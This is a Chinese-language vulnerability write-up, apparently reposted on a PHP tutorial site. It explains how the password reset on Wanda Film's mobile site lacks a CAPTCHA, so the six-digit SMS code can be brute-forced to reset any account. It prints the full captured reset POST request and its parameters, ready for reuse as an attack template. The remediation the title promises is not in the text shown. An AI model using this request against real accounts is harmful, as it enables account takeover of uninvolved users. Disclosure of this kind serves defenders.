万达电影网站的任意帐号密码重置漏洞及修复-自学php网

万达电影网站的任意帐号密码重置漏洞及修复

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 1.万达电影网站的主站对密码重置这一模块，部署了强悍的验证码，因此这里是没有问题的！2.但是在给移动终端访问的站点http://m.wandafilm.com存在问题，没有部署验证码，可以通过爆破手...

1.万达电影网站的主站对密码重置这一模块，部署了强悍的验证码，因此这里是没有问题的！

2.但是在给移动终端访问的站点http://m.wandafilm.com存在问题，没有部署验证码，可以通过爆破手机短信码（区别于图片验证码，这里称作短信码）从而重置任意帐号的密码，听我慢慢道来！首先打开移动终端的主站，点击【会员中心】

3.如果你没有登录的话，会跳到登录界面，但是看到【忘记密码？】。我激动了：

4.点她吧！输入要找回密码的手机号码，我这里为测试，使用了自己的：

5.点击【获取验证码】，网站便跳转到了重置的页面同时手机上收到短信码，为6位纯数字：745233，我随手写个6位纯数字验证码111111，并填上需要重置的密码，点击提交，这里注意要抓包，查看请求：

可以看到返回"手机验证码错误"的字样

6.从抓包的数据看，POST的请求为：

POST /member/resetPassByToken.do HTTP/1.1

Host: m.wandafilm.com

Proxy-Connection: keep-alive

Content-Length: 48

Cache-Control: max-age=0

Origin: http://m.wandafilm.com

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Referer: http://m.wandafilm.com/member/findPass.do

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Cookie: cityCodeCookies=3774659600; JSESSIONID=EF648CCE0C1400944E9125F5ACAAD04C; __utma=81395784.778974478.1351818648.1351818648.1351837926.2; __utmb=81395784.33.10.1351837926; __utmc=81395784; __utmz=81395784.1351818648.1.1.utmcsr=wanda.cn|utmccn=(referral)|utmcmd=referral|utmcct=/group/jumpPage/hotel.shtml; Hm_lvt_12e233684b48dc67054644eaa9e278fc=1351818647992,1351819397061,1351837925819; Hm_lpvt_12e233684b48dc67054644eaa9e278fc=1351838684225

mobileNo=手机号&token=111111&newPass=222222

其中，mobileNo参数为手机号，token参数为短信码，newPass为需要重置的密码，那么只要token被猜测对了，只需一次请求即可重置相关手机号的密码：